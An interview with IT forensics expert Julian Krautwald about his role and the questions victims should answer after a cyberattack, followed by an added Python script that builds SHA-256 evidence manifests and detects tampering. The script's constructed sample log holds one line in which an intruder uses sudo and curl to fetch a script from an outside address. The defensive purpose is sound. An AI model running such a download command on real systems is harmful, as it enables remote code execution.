In IT, forensic experts are among the most sought-after specialists of all, both at investigative authorities and in companies. They are responsible for securing traces and evidence after a cyberattack. We asked our forensics expert Julian Krautwald about his work. In the first part of our conversation, we find out: what does an IT forensics expert actually do?
Julian, you are an IT forensics expert. What distinguishes your work from that of an IT expert?
The IT expert is your first contact when it comes to “all things technical”. He makes sure that your IT equipment works properly and that you have all the tools you need to perform your daily work on your workplace computer. In addition, he should be the first point of contact for technical problems and malfunctions at your workplace.
More specifically, he takes care of the installation, configuration, operation and maintenance of infrastructure/network components, systems and services, both hardware and software. He is responsible for technical fault diagnosis and takes care of the recovery of systems and data. He also oversees the documentation of technical process flows, action instructions and configurations.
Then there’s the IT security expert. What exactly does he do – as opposed to you?
At first, you don’t notice much of the IT security expert’s activities in your day-to-day work. This is mainly because the IT security expert works very closely with the IT expert to implement IT security measures, but is not the first point of contact for employees. You tend to “feel” the measures implemented by the IT security expert subconsciously, for example when the operating system of your workstation suddenly prompts you (once again) to change your login password. For most employees, many of these measures at first appear to restrict the user-friendliness of the systems they are using. It is only when an IT security expert gives employees an insight into why certain measures are extremely important and what can happen if they are not implemented that this usually leads to more acceptance of his work in the company.
And at what point does your work as an IT forensic specialist become necessary?
Not until your company has already been the victim of a cyberattack – or you at least suspect that this is the case – and the colleagues described above cannot clearly determine how the incident occurred and/or what the best strategy is to contain the damage and return operations to “normal”. This is where an IT forensic analyst assists and advises these colleagues in diagnosis, analysis and root cause analysis, as well as prioritization of immediate actions in response to information security incidents.
This involves analyzing large amounts of data, technical logs and entire system images. The goal of the analysis: to prove signs and causes of an information security incident, to evaluate the level of compromise and, if necessary, to prepare the evidence found in a way that can be used in court. In addition, he is responsible for developing defense strategies and initiating necessary mitigation measures. He also defines the countermeasures. Last but not least, he documents the facts of the case and the activities carried out.
Ideally, what questions do victims need to be able to answer so you can quickly resolve and treat the cyber emergency?
To clarify what happened, it should at least be possible to answer the classic W questions:
List of questions in an emergency
- What exactly has happened?
- How was the incident discovered (e.g., was there a warning message from the system? Did you notice increased system load or longer response times?)
- How does the incident manifest itself (e.g., anomalies on clients)?
- What activities were performed beforehand (e.g., web browsing, reading e-mails, inserting a USB stick)?
- Were immediate measures taken after the incident was discovered (e.g., virus scans, deletion of data, changes to system files)?
- Has there been a similar problem in the past? How was this problem dealt with?
- Which systems (OS) and/or applications are affected?
- How many systems are affected?
- Are they client systems, server systems, or both?
- Who has access to the affected systems?
- Which users / user groups are affected?
- How many users are affected?
- What rights do the affected users have on the affected systems?
- How are the affected systems secured (firewalls, AntiVirus, IDS, IPS, etc.)?
In general, however, the more detailed the incident can be described, the better it is for diagnosing and solving the problem. If a smartphone with a camera is available, it can also help to document the incident with photos.
(End of Part 1)
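Two points from the conversation above are worth showing in working code: evidence is only usable in court if its integrity can be demonstrated, and “immediate measures” taken after discovery (virus scans, deleting data, editing system files) can silently alter that evidence. The following Python script is an added example, not code from the interview or from Julian Krautwald; the case number, examiner name, file names and log lines in it are constructed for illustration. It records a SHA-256 fingerprint plus acquisition metadata for an artefact at the moment it is secured, and later re-verifies the artefact, so that a well-meant cleanup that removes a suspicious log line is detected as a change.

```python
"""Evidence integrity manifest for forensic intake (added example).

Hypothetical helper, not code from the interview: it records a SHA-256
fingerprint and acquisition metadata for an artefact (a log file, a disk image)
so that any later change, including well-meant "immediate measures" such as a
cleanup run, is detectable. All sample data below is constructed.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1 << 20  # hash in 1 MiB chunks so multi-GB images need not fit in RAM


def sha256_file(path):
    """Stream the file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def acquire(path, case_id, examiner, note):
    """Build the manifest entry for one artefact at acquisition time."""
    return {
        "case_id": case_id,
        "examiner": examiner,
        "artefact": os.path.basename(path),
        "size": os.path.getsize(path),
        "sha256": sha256_file(path),
        "acquired_at": datetime.now(timezone.utc).isoformat(),
        "note": note,
    }


def verify(path, entry):
    """Re-hash the artefact; return (unchanged, current_digest)."""
    current = sha256_file(path)
    return current == entry["sha256"], current


def demo():
    """Acquire a constructed log, then simulate a cleanup that edits it."""
    workdir = tempfile.mkdtemp()
    log = os.path.join(workdir, "auth.log")
    # Constructed sample log lines (documentation addresses), not real data.
    with open(log, "w") as f:
        f.write("2024-05-01T08:12:03Z sshd: Accepted password for admin from 203.0.113.7\n")
        f.write("2024-05-01T08:12:09Z sudo: admin : COMMAND=/usr/bin/curl http://203.0.113.7/x.sh\n")
    entry = acquire(log, "CASE-0001", "J. Example",
                    "copy of /var/log/auth.log from host web01 (constructed)")
    # Persist the manifest next to the evidence; in practice keep it separately.
    with open(os.path.join(workdir, "manifest.json"), "w") as f:
        json.dump([entry], f, indent=2)
    ok_before, _ = verify(log, entry)

    # An "immediate measure" after discovery: someone removes the suspicious line.
    with open(log, "r+") as f:
        kept = [line for line in f if "curl" not in line]
        f.seek(0)
        f.truncate()
        f.writelines(kept)
    ok_after, _ = verify(log, entry)
    return ok_before, ok_after


if __name__ == "__main__":
    print(demo())  # (True, False)
```

The first verification succeeds because nothing has touched the file since acquisition; the second fails because the cleanup changed its contents, which is exactly the kind of alteration that makes an artefact contestable in court. In real cases the manifest is written to write-once or separately controlled storage and the original medium is imaged read-only, so that analysis happens on a verified copy rather than on the evidence itself.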